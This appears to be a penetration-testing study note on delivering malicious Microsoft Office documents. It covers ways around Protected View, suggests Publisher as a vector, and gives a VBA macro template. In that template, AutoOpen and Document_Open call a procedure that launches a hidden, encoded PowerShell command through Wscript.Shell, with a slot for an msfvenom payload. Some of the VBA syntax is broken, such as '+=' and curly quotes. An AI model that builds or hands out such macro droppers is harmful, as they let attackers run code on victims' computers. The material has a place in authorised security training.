When served from the Internet, say through an email or a download link, we must bypass another layer of protection known as Protected View, 362 which disables all editing and modifications in the document and blocks the execution of macros or embedded objects.

While the victim may click Enable Editing and exit Protected View, this is unlikely. Ideally, we would prefer bypassing Protected View altogether. Like Microsoft Word, Microsoft Publisher allows embedded objects without Protected View and ultimately code execution in exactly the same manner as Word and Excel. The downside is that Publisher is less frequently installed than Word or Excel. Still, if your fingerprinting detects an installation of Publisher, this may be a viable and better vector.

As simple as clicking the macros button on a document. But also as complex as being able to code macros with VBA(visual basic for applications) to then be included.

Since Office macros are not executed automatically, we must make use of two predefined procedures, namely the AutoOpen procedure, which is executed when a new document is opened and the Document_Open 355 procedure, which is executed when an already-open document is re-opened. Both of these procedures can call our custom procedure and therefore run our code.

-------------VBA code-------------------

(save as doc or docm //docx does not support macros) Also the spaces below are all important to the script in VBA

Sub AutoOpen()
MyMacro 
End Sub 

Sub Document_Open() 
MyMacro 
End Sub 

Sub MyMacro() 
Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str += “our_base64_msfvenom command goes here”
Str += “make sure to split it up sice there is a size limit on literal strings”
CreateObject("Wscript.Shell").Run Str
End Sub